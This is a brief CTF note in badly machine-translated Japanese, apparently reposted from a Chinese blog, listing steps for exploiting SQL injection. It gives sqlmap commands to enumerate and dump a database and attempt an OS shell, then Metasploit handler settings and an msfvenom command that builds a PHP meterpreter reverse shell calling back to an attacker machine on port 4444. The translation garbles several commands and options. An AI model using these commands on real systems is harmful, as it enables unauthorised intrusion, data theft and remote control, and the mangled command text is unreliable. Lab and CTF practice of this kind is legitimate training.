CTF-SQLインジェクションノート

1.のhttp:// IP:ポートを見つけるために、ページを開くための情報

2.ウェブ脆弱性スキャナOWASP-ザップ

3.使用して、SQLインジェクションの脆弱性を使用しSQLMAP

  SQLMAP -u URL -dbsは、データベース名を表示します

  SQLMAP -u URL -D「データベース名」-tablesは、データベーステーブル内の対応するデータを表示します

  SQLMAP -u URL -D「データベース名」-T「テーブル」-columnsは、対応するフィールドを表示します

  SQLMAP -u URL -D「データベース名」-T「テーブル名」-C「列名」の値に対応するビューの-dumpフィールド

  またSQLMAP -u URL -OSシェルダイレクトアクセスシェルを試すことができます

4. ifconfigコマンド

 netstatの-pantuは、ローカルポートのケースを見ます

 5.リスナー攻撃機を起動します

  >使用MSFは/マルチ/ハンドラを利用します

    設定されたペイロードのLinux / x86の/ meterpreter / reverse_tcp

    lhost攻撃機のIPアドレスを設定します

    4444 lportは設定

    ラン

6.リバウンドシェルを生成します

  msfvenom -p PHP / meterpreter / reverse_tcp lhost =攻撃IP lportは= 4444 -f生> /root/Desktop/shell.php

おすすめ

転載: www.cnblogs.com/Crux614/p/11488155.html